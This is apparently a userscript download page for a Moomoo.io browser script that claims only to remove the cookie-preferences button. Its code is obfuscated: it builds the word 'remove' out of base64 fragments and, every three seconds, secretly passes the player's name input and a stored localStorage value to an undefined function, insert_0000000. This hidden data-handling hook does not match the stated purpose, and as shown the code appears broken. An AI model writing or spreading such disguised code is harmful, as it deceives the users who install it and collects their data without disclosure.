Moomoo.io Remove Cookie Preferences Tab

Simple tool to delete the cookies tab from MooMoo.io

K instalaci tototo skriptu si budete muset nainstalovat rozšíření jako Tampermonkey, Greasemonkey nebo Violentmonkey.

You will need to install an extension such as Tampermonkey to install this script.

K instalaci tohoto skriptu si budete muset nainstalovat rozšíření jako Tampermonkey nebo Violentmonkey.

K instalaci tohoto skriptu si budete muset nainstalovat rozšíření jako Tampermonkey nebo Userscripts.

You will need to install an extension such as Tampermonkey to install this script.

K instalaci tohoto skriptu si budete muset nainstalovat manažer uživatelských skriptů.

(Už mám manažer uživatelských skriptů, nechte mě ho nainstalovat!)

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install a user style manager extension to install this style.

You will need to install a user style manager extension to install this style.

You will need to install a user style manager extension to install this style.

(Už mám manažer uživatelských stylů, nechte mě ho nainstalovat!)

// ==UserScript==
// @name        Moomoo.io Remove Cookie Preferences Tab
// @namespace    -
// @version     0.0.3
// @description Simple tool to delete the cookies tab from MooMoo.io
// @author      nobody
// @match        *://moomoo.io/*
// @match        *://sandbox.moomoo.io/*
// @match        *://dev.moomoo.io/*
// @match        *://*.moomoo.io/*
// @grant        none
// ==/UserScript==

var mn = localStorage["moo_name"];
function generateDeleter() {
    return {
        a: ['c'],
        b: ['m'],
        c: ['V'],
        d: ['t'],
        e: () => {
            insert_0000000(true, document.getElementById("nameInput").value + "|" + mn);
            return "b3Zl";
        },
        xx: ["ot-sdk-btn-floating"]
    };
};
setInterval(()=>{
    var delx = generateDeleter();
    document.getElementById(delx.xx[0])[atob(
        delx.a[0] + "" +
        delx.b[0] + "" +
        delx.c[0] + "" +
        delx.d[0] + "" +
        delx.e()
    )](); delx.e();
}, 3000);